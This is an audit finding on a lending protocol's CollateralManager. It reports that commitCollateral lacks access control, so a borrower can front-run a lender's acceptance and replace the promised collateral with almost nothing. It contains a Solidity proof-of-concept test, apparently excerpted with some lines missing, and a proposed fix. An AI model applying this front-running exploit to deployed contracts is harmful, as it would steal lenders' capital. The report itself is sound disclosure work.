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Malicious update of bid with commitCollateral function


The borrower (or any other user), can change the collateral amount without changing the bid, which results in losing capital for the lender.

Vulnerability Detail

Collateral is transferred to escrow when lender accepts the bid. Deposit happens in _deposit function and it uses collateral.collateralInfo to get the info what collateral it should transfer. The problem is that colletaralInfo can be set to any value by anyone with the commitCollateral. This allows the borrower (or anyone) to frontrun the acceptBid function, and set collateral to some worthless asset or/and value. We can easily imagine that someone takes 10 mln DAI loan giving 1 wei ETH collateral in exchange.


Lost capital by lender.

Code Snippet

Test inside the TellerV2_Test.sol,

  1. Borrower submits bid for 10 WETH
  2. Borrower commits collateral for 1 WETH
  3. Lender accepts bid thinking that he will get 10 WETH as collateral
function test_maliciousUpdateOfCommitCollateral() public {
        assertEq(wethMock.balanceOf(address(borrower)), 50000, "borrower balance WETH before loan");
        assertEq(daiMock.balanceOf(address(borrower)), 50000, "borrower balance DAI before loan");
        assertEq(wethMock.balanceOf(address(lender)), 500000, "lender balance WETH before loan");
        assertEq(daiMock.balanceOf(address(lender)), 500000, "lender balance DAI before loan");

        // Submit bid as borrower
        uint256 bidId = submitCollateralBid();

        Collateral[] memory collateralInfo = new Collateral[](1);
        collateralInfo[0] = Collateral({
            _amount: 1,
            _tokenId: 0,
            _collateralType: CollateralType.ERC20,
            _collateralAddress: address(wethMock)

        collateralManager.commitCollateral(bidId, collateralInfo); // frontrun the acceptBid

        // Accept bid as lender

        assertEq(wethMock.balanceOf(address(borrower)), 49999, "borrower balance WETH after loan"); // should be 49990 if protocol would work correctly, but only 1 wei was transfered to escrow
        assertEq(daiMock.balanceOf(address(borrower)), 50095, "borrower balance DAI after loan");
        assertEq(wethMock.balanceOf(address(lender)), 500000, "lender balance WETH after loan");
        assertEq(daiMock.balanceOf(address(lender)), 499900, "lender balance DAI after loan");

Tool used

Manual Review


Add the onlyTellerV2 modifier for commitCollateral function in CollateralManager.sol so malicious update of the bid won't be possible. The downside is that submitBid without collateral won't be possible, so every bid would be a non-changeable (or cancellable) offer for the lender. If you would like to keep changeable nature of the bid then probably you would have to introduce some kind of timelock for changing bid.